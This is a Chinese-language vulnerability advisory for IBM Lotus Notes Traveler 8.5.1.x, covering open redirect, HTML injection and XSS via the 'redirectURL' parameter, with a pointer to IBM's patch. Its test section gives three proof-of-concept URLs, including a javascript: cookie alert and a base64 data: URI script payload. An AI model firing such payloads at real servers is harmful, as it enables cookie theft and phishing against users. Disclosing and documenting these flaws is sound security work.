发布日期：2012-09-28
更新日期：2012-10-10

受影响系统：

IBM Lotus Notes Traveler 8.5.1.3
IBM Lotus Notes Traveler 8.5.1.2
IBM Lotus Notes Traveler 8.5.1.1
IBM Lotus Notes Traveler 8.5.1.0

描述：

---

BUGTRAQ  ID: 55740

IBM Lotus Notes Traveler是为使用受支持移动设备的Lotus Notes用户提供的访问电子邮件和PIM应用程序的产品。

IBM Lotus Notes Traveler 8.5.3及更早版本存在URI重定向漏洞、HTML注入漏洞、XSS漏洞，成功利用后可允许攻击者在受影响浏览器中执行HTML和脚本代码，窃取Cookie身份验证凭证，控制站点外观、执行钓鱼攻击。

<*来源：Eugene Dokukin aka MustLive
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/servlet/traveler?deviceType=700&amp;redirectURL=javascript:alert(document.cookie)

http://www.example.com/servlet/traveler?deviceType=700&amp;redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://www.example.com/servlet/traveler?deviceType=700&amp;redirectURL=http://websecurity.com.ua

建议：

---

厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.ers.ibm.com/

浏览次数：2520
严重程度：0（网友投票）